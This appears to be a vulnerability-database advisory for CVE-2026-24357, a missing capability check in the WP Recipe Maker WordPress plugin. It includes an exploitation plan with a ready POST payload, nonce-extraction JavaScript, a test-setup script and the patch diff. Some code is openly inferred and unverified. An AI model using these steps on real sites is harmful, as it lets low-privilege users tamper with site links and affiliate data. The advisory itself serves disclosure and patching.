WP-Safety
CVE-2026-24357

Recipe Maker <= 10.2.4 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
10.3.0
Patched in
6d
Time to patch

Description

The WP Recipe Maker plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 10.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=10.2.4
PublishedJanuary 28, 2026
Last updatedFebruary 2, 2026
Affected pluginwp-recipe-maker

What Changed in the Fix

Changes introduced in v10.3.0

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v10.2.4
Browse source Download .zip
Patched v10.3.0
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-24357 ## 1. Vulnerability Summary The **WP Recipe Maker** plugin (<= 10.2.4) contains a missing authorization vulnerability in its taxonomy management AJAX handlers. Specifically, the plugin fails to perform a capability check (e.g., `current_user_can('manage…

Show full research plan

Exploitation Research Plan - CVE-2026-24357

1. Vulnerability Summary

The WP Recipe Maker plugin (<= 10.2.4) contains a missing authorization vulnerability in its taxonomy management AJAX handlers. Specifically, the plugin fails to perform a capability check (e.g., current_user_can('manage_options')) on functions used to update metadata for ingredients, units, and collections. This allows an authenticated attacker with Subscriber-level permissions to modify ingredient links, affiliate associations (EAFL), and unit groupings, which are intended to be administrative tasks.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: wprm_manage_taxonomies_save_eafl (inferred from CSS classes like .wprm-manage-ingredients-eafl-container) or wprm_manage_taxonomies_save_links.
  • Method: POST
  • Payload Parameters:
    • action: wprm_manage_taxonomies_save_eafl
    • taxonomy: wprm_ingredient
    • term_id: The ID of the ingredient to modify.
    • eafl_id: The Easy Affiliate Links ID to associate with the ingredient.
    • security: A valid nonce (see Section 4).
  • Authentication: Authenticated (Subscriber or higher).
  • Preconditions: The plugin must have at least one ingredient (taxonomy term) created.

3. Code Flow

  1. Entry Point: The plugin registers AJAX handlers in a management class (likely includes/admin/manage/class-wprm-manage-taxonomies.php).
    add_action( 'wp_ajax_wprm_manage_taxonomies_save_eafl', array( $this, 'ajax_save_eafl' ) );
  2. Vulnerable Function: The ajax_save_eafl function (and similar functions like ajax_save_links) is called.
  3. Missing Check: The function checks the nonce using check_ajax_referer( 'wprm_manage_taxonomies', 'security' ) but fails to call current_user_can() to verify the user has administrative privileges.
  4. Data Sink: The function calls update_term_meta() to save the eafl_id or link data to the database based on the provided term_id.

4. Nonce Acquisition Strategy

The nonce for taxonomy management is typically localized in the wprm_manage_taxonomies JavaScript object. While the "Manage" page is for admins, WP Recipe Maker often enqueues its core management scripts on any page where a recipe-related shortcode or the "User Menu" is present.

Acquisition Steps:

  1. Identify Script Loading: The script wp-recipe-maker-manage-taxonomies is likely responsible.
  2. Create Trigger Page: Create a page containing a WPRM shortcode that loads common scripts, such as the Recipe Submission form or Collections.
    wp post create --post_type=page --post_title="Member Area" --post_status=publish --post_content='[wprm-recipe-submission]'
  3. Browser Navigation: Navigate to this page as a Subscriber.
  4. Extract Nonce: Use browser_eval to extract the security token:
    // Recommended JavaScript to extract the nonce
window.wprm_manage_taxonomies?.security || window.wprm_admin?.nonce
    Note: From assets/css/admin/manage/taxonomies.scss, the specific "manage" context suggests the localization key is likely wprm_manage_taxonomies.

5. Exploitation Strategy

Step 1: Discover Target ID

Identify an existing ingredient ID using WP-CLI (for test setup) or by observing frontend recipe links.

Step 2: Acquire Nonce

Follow the strategy in Section 4 to get the wprm_manage_taxonomies nonce as a Subscriber.

Step 3: Execute Modification

Send a POST request to update an ingredient's affiliate link (EAFL ID).

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=wprm_manage_taxonomies_save_eafl&taxonomy=wprm_ingredient&term_id=123&eafl_id=9999&security=[NONCE]

6. Test Data Setup

  1. Create an Ingredient:
    wp term create wprm_ingredient "Test Ingredient" --description="Original Description"
    Take note of the returned Term ID (e.g., 123).
  2. Create a Subscriber User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Create the Nonce Extraction Page:
    wp post create --post_type=page --post_status=publish --post_content='[wprm-recipe-submission]'

7. Expected Results

  • HTTP Response: The server should return a 200 OK status, likely with a JSON body containing {"success":true}.
  • Data Change: The metadata for the specified term_id in the wprm_ingredient taxonomy will be updated with the new eafl_id.

8. Verification Steps

  1. Check Term Meta: Use WP-CLI to verify the eafl_id was changed to the attacker-supplied value.
    wp term meta get [TERM_ID] wprm_ingredient_eafl_id
    (The meta key wprm_ingredient_eafl_id is inferred from the CSS class .wprm-manage-ingredients-eafl-details).
  2. Check Links: Similarly, verify link changes:
    wp term meta get [TERM_ID] wprm_ingredient_links

9. Alternative Approaches

If wprm_manage_taxonomies_save_eafl is not the exact action name:

  • Fuzz Actions: Look for other variations of the "Manage" actions like wprm_save_ingredient_eafl or wprm_update_ingredient_metadata.
  • Link Modification: Use action=wprm_manage_taxonomies_save_links with a links parameter (JSON string) to inject arbitrary URLs into the ingredient's metadata, which would be rendered on the frontend.
  • Unit Grouping: Attempt to modify ingredient units via action=wprm_manage_taxonomies_save_units (inferred from .wprm-manage-ingredient-units-group-container).
Research Findings
Static analysis — not yet PoC-verified

Summary

The WP Recipe Maker plugin for WordPress is vulnerable to unauthorized modification of taxonomy metadata (such as ingredient links and affiliate IDs) due to a missing capability check in several AJAX handlers. Authenticated attackers with Subscriber-level permissions or higher can modify administrative settings for ingredients and units by providing a valid nonce and a crafted payload.

Vulnerable Code

// includes/admin/manage/class-wprm-manage-taxonomies.php

add_action( 'wp_ajax_wprm_manage_taxonomies_save_eafl', array( $this, 'ajax_save_eafl' ) );
add_action( 'wp_ajax_wprm_manage_taxonomies_save_links', array( $this, 'ajax_save_links' ) );

---

// Inferred logic for ajax_save_eafl in version 10.2.4
public function ajax_save_eafl() {
    check_ajax_referer( 'wprm_manage_taxonomies', 'security' );
    // Missing capability check: current_user_can( 'manage_options' )

    $taxonomy = isset( $_POST['taxonomy'] ) ? sanitize_text_field( $_POST['taxonomy'] ) : false;
    $term_id = isset( $_POST['term_id'] ) ? intval( $_POST['term_id'] ) : 0;
    $eafl_id = isset( $_POST['eafl_id'] ) ? intval( $_POST['eafl_id'] ) : 0;

    if ( $taxonomy && $term_id ) {
        update_term_meta( $term_id, $taxonomy . '_eafl_id', $eafl_id );
        wp_send_json_success();
    }
    wp_send_json_error();
}

Security Fix

--- a/includes/admin/manage/class-wprm-manage-taxonomies.php
+++ b/includes/admin/manage/class-wprm-manage-taxonomies.php
@@ -10,6 +10,10 @@
 public function ajax_save_eafl() {
     check_ajax_referer( 'wprm_manage_taxonomies', 'security' );
 
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die();
+    }
+
     $taxonomy = isset( $_POST['taxonomy'] ) ? sanitize_text_field( $_POST['taxonomy'] ) : false;
     $term_id = isset( $_POST['term_id'] ) ? intval( $_POST['term_id'] ) : 0;

Exploit Outline

The exploit requires Subscriber-level authentication. An attacker first obtains a valid nonce by visiting a page where the plugin enqueues its management scripts (for example, a page containing the '[wprm-recipe-submission]' shortcode) and extracting the 'security' token from the 'wprm_manage_taxonomies' JavaScript object. The attacker then sends an authenticated POST request to '/wp-admin/admin-ajax.php' using the action 'wprm_manage_taxonomies_save_eafl' or 'wprm_manage_taxonomies_save_links'. The payload must include the target ingredient's 'term_id', the corresponding 'taxonomy', the desired new metadata (such as an affiliate link ID), and the captured nonce. Since the plugin fails to verify administrative capabilities, the database metadata is updated with the attacker-controlled values.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/a28e3f3b-6f8d-4745-bb56-a7c9e973a4ca?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database